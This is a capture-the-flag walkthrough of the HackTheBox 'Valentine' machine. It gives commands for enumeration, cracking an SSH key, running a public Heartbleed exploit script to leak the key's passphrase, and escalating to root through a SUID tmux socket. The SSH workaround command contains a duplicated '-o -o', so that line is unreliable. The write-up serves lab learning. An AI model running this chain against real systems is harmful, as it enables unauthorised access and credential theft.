Valentine
Abusing SSL HeartBleed vulnerability - SSH Trouble Shooting - SUID Socket PrivEsc via tmux
Scanning

HTTP Enumeration

Viewing the source dint give me anything nor robots.txt file
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.10.79

Viewing the /dev
gives two important files, the encode and decode endpoints are just scripts run by the backend - Tried command injections there, but nothing worked :(

The hype_key
is a hex encoded string

Let’s use an online tool to convert it to text - We find out that it is an RSA private key!

Changing the permissions and tried logging via ssh
chmod 400 hype_key
ssh -i hype_key hype@valentine.htb
hype_key's passphrase:
So now we need to figure the passphrase for this we can use ssh2john
utility !
ssh2john hype_key > out
john out --wordlist=/opt/rockyou.txt
. . . . .
Nothing useful, john couldn't crack - BACK TO ENUMERATION :(
nmap --script vuln -oA vuln-scan 10.10.10.79

It is essentially a vulnerability in the popular OpenSSL cryptographic software library. This vulnerability allows anyone on the Internet to read the memory of the systems protected by this vulnerable version of OpenSSL. This can lead to the compromise of secret keys, passwords, information, etc. It also allows attackers to eavesdrop on communications.
Inorder to exploit this we can use this script
git clone https://gist.github.com/10174134.git

Let’s run the exploit with a loop number of 10
python heartbleed.py -p 443 -n 10 10.10.10.79

We get a base64 encoded string, when we decode it - we have the passphrase !
echo "aGVhcn.........." | base64 -d
heartbleedbeleievethehype
We can now log on to the box using ssh
ssh -i hype_key hype@10.10.10.79
Enter passphrase for key 'hype_key':
sign_and_send_pubkey: no mutual signature supported
Encountered this error and spent some time fixing this - the fix is
ssh -o -o PubkeyAcceptedKeyTypes=+ssh-rsa -i hype_key hype@10.10.10.79

Privilege Escalation
Checked the .bash_history because it wasn't linked to /dev/null
ls -la /
cd .devs
ls -l dev_sess
tmux -S /.devs/dev_sess
exit
The file dev_sess
was a socket file and it had a SUID bit to it - When we attached the socket process via tmux - We become root !
Last updated